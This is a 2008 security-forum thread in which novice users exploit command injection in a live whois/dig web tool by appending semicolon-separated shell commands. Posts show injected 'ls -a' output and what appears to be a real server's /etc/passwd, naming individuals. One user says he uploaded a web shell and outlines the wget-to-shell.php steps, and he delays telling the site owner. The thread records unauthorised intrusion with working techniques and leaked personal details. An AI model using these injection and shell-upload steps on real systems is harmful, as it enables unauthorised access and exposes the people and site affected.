Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 2, 2023
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 356
Members: 0
Total: 356
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Hmm question
Post new topic  Reply to topic View previous topic :: View next topic 
Hmm question
PostPosted: Sat Jun 07, 2008 3:05 am Reply with quote
Chedda
Active user
Active user
 
Joined: May 26, 2008
Posts: 27




So I was browsing around looking for a good place for a wannabe hacker. I came across this, but wasn't given any information on how its performed. I have been looking elsewhere to find more information on this exploit and I think I would something, but not even sure if its correct. "whois.net is running a shell command, you can end one and start another. You'd do that by adding a semicolon to the Dig arguments."

So I tried such commands as website.com;ls -a and it actually works, but not like the below. Can anyone fill in the gaps?


Quote:

You Are Searching For ***censored due to it being a spoiler*** /etc/passwd:

; <<>> DiG 9.2.3 <<>>
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34366
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 14

;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 154054 IN NS G.ROOT-SERVERS.NET.
. 154054 IN NS K.ROOT-SERVERS.NET.
. 154054 IN NS A.ROOT-SERVERS.NET.
. 154054 IN NS I.ROOT-SERVERS.NET.
. 154054 IN NS L.ROOT-SERVERS.NET.
. 154054 IN NS D.ROOT-SERVERS.NET.
. 154054 IN NS C.ROOT-SERVERS.NET.
. 154054 IN NS M.ROOT-SERVERS.NET.
. 154054 IN NS F.ROOT-SERVERS.NET.
. 154054 IN NS H.ROOT-SERVERS.NET.
. 154054 IN NS E.ROOT-SERVERS.NET.
. 154054 IN NS J.ROOT-SERVERS.NET.
. 154054 IN NS B.ROOT-SERVERS.NET.

;; ADDITIONAL SECTION:
K.ROOT-SERVERS.NET. 509993 IN A 193.0.14.129
K.ROOT-SERVERS.NET. 509993 IN AAAA 2001:7fd::1
L.ROOT-SERVERS.NET. 603676 IN A 199.7.83.42
M.ROOT-SERVERS.NET. 603676 IN A 202.12.27.33
M.ROOT-SERVERS.NET. 603676 IN AAAA 2001:dc3::35
A.ROOT-SERVERS.NET. 603676 IN A 198.41.0.4
A.ROOT-SERVERS.NET. 603676 IN AAAA 2001:503:ba3e::2:30
B.ROOT-SERVERS.NET. 602195 IN A 192.228.79.201
C.ROOT-SERVERS.NET. 602195 IN A 192.33.4.12
D.ROOT-SERVERS.NET. 509993 IN A 128.8.10.90
E.ROOT-SERVERS.NET. 603676 IN A 192.203.230.10
F.ROOT-SERVERS.NET. 514317 IN A 192.5.5.241
F.ROOT-SERVERS.NET. 514317 IN AAAA 2001:500:2f::f
G.ROOT-SERVERS.NET. 514317 IN A 192.112.36.4

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue May 20 23:05:41 2008
;; MSG SIZE rcvd: 500

# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
webadmin:*:79:79:Web Admin:/usr/local/apache:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
websitetools:*:1001:1001:Administrative User:/home/websitetools:/bin/tcsh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
dgudema:*:1002:1002:Daniel Gudema:/home/dgudema:/bin/tcsh
bibana:*:1003:1003:Bryant Ibana:/home/bibana:/usr/local/bin/bash
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin


Last edited by Chedda on Sun Jun 08, 2008 12:39 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sat Jun 07, 2008 7:16 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Interesting, good find. You could now use wget and upload shell.
How did you find this vulnerability?


and btw, No links to vulnerable sites.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sat Jun 07, 2008 4:41 pm Reply with quote
Chedda
Active user
Active user
 
Joined: May 26, 2008
Posts: 27




I was merely googling random thing about hacking in general and came across it on a forum. I didn't really find anything someone else did all the work. The forum is dead though and the post a couple of months old. They never said what they did to accomplish this, so I was wondering if you knew what command they used?


Code:
website.com;ls -a
only returns

Quote:
You Are Searching For ****.com;ls -a:

; <<>> DiG 9.2.3 <<>> ****.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60077
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;****.com. IN A

;; ANSWER SECTION:
****.com. 43200 IN A 65.162.***.***

;; AUTHORITY SECTION:
****.com. 43200 IN NS ns2.address.com.
****.com. 43200 IN NS ns1.address.com.

;; Query time: 104 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Jun 7 16:39:40 2008
;; MSG SIZE rcvd: 85

.
..
.htaccess
Application.php
Browsersize.URL
admin
back.jpg
circuit.dtd
circuit.xml
dspHelloWorld.php
dspTesting.php
dsp_about.php
fusebox.dtd
fusebox.init.php
fusebox.xml
fusebox4.loader.php4.php
fusebox4.parser.php4.php
fusebox4.runtime.php4.php
fusebox4.transformer.php4.php
includes
index.php
index_old.html
ipaddress
layFooter.php
layHeader.php
layouts
left.jpg
lib
manual
parsed
ping
plugins
protolize
right.jpg
seo
tools
udf_canonicalpath.php
udf_relativefilepath.php
validator
websites
websitetools.css
whois
whois.net
View user's profile Send private message
PostPosted: Sat Jun 07, 2008 6:08 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try website.com;pwd
View user's profile Send private message
PostPosted: Sun Jun 08, 2008 12:15 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 08, 2008 12:33 am Reply with quote
Chedda
Active user
Active user
 
Joined: May 26, 2008
Posts: 27




gibbocool wrote:
I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.


Hehe glad to see someone got some use out of it. As far I am concerned you can email them I will never figure out how to use it sadly.
View user's profile Send private message
PostPosted: Sun Jun 08, 2008 4:50 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 08, 2008 5:00 am Reply with quote
Chedda
Active user
Active user
 
Joined: May 26, 2008
Posts: 27




gibbocool wrote:
Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.


Why can't even be as cool as you Gibbocool. You make everything so simple, love it!
View user's profile Send private message
PostPosted: Wed Jun 11, 2008 5:40 pm Reply with quote
Kazuma
Beginner
Beginner
 
Joined: May 17, 2008
Posts: 3
Location: Zwollywood




No succes for me on multiple websites. It just returns a list of my local machine Laughing
View user's profile Send private message
Hmm question
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.116 Seconds